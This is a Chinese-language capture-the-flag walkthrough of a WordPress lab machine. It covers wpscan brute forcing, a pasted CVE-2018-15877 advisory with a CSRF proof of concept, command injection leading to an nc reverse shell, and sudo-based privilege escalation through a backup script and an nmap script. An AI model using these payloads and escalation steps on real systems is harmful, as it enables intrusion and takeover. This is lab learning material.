确定靶机192.168.0.141
开放端口80,查看一下
nmap -sP 192.168.0.0/24
nmap -sV 192.168.0.141
不能直接查看
vim /etc/hosts 添加一下
可以访问了,发现是wordpass,上wpscan
找到了五个用户名,把五个用户名写进一个txt文件,当作用户名字典
kali自带一个字典rockyou.txt
wpscan --url http://wordy -eu
一点也不耗时,才一个小时,刺激
网上找了一下后台,wp-admin
等不了了,直接在网上找答案吧
账号:mark
密码:helpdesk01
wpscan --url http://wordy -U /Desktop/user.txt -P /usr/share/wordlists/rockyou.txt
<!--
About:
===========
Component: Plainview Activity Monitor (Wordpress plugin)
Vulnerable version: 20161228 and possibly prior
Fixed version: 20180826
CVE-ID: CVE-2018-15877
CWE-ID: CWE-78
Author:
- LydA(c)ric Lefebvre (https://www.linkedin.com/in/lydericlefebvre)
Timeline:
===========
- 2018/08/25: Vulnerability found
- 2018/08/25: CVE-ID request
- 2018/08/26: Reported to developer
- 2018/08/26: Fixed version
- 2018/08/26: Advisory published on GitHub
- 2018/08/26: Advisory sent to bugtraq mailing list
Description:
===========
Plainview Activity Monitor Wordpress plugin is vulnerable to OS
command injection which allows an attacker to remotely execute
commands on underlying system. Application passes unsafe user supplied
data to ip parameter into activities_overview.php.
Privileges are required in order to exploit this vulnerability, but
this plugin version is also vulnerable to CSRF attack and Reflected
XSS. Combined, these three vulnerabilities can lead to Remote Command
Execution just with an admin click on a malicious link.
References:
===========
https://github.com/aas-n/CVE/blob/master/CVE-2018-15877/
PoC:
-->
<html>
<!-- Wordpress Plainview Activity Monitor RCE
[+] Version: 20161228 and possibly prior
[+] Description: Combine OS Commanding and CSRF to get reverse shell
[+] Author: LydA(c)ric LEFEBVRE
[+] CVE-ID: CVE-2018-15877
[+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell
[+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well
-->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
<input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" />
<input type="hidden" name="lookup" value="Lookup" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
看见插件,找漏洞
远程命令执行漏洞
已经给出利用了
输入一个域名,bp抓包
域名后面接|id
有输出
直接上nc
nc -e /bin/sh 192.168.0.128 4444
python -c 'import pty;pty.spawn("/bin/bash")'
查看文件,给出
账号:graham
密码:GSo7isUM1D4
SSH登录刚才给出的账号
ssh graham@192.168.0.141 -P
jens没有密码
看到backups.sh
是一个打包文件
sudo -l
/bin/bash写入文件
运行
echo "/bin/bash" >> backups.sh
sudo -u jens ./backups.sh
继续查看可执行的操作
nmap提权
sudo -l
echo ‘os.execute("/bin/sh")' > getshell
sudo nmap --script=getshell
cd /root
cat theflag.txt
拿到flag!!!!
一个星期时间,一个靶机也没刷,也不知道自己干嘛了,还以为之前的知识都忘了呢,还好没忘,感觉还比之前更熟练了,半天就可以搞定一个靶机,加油!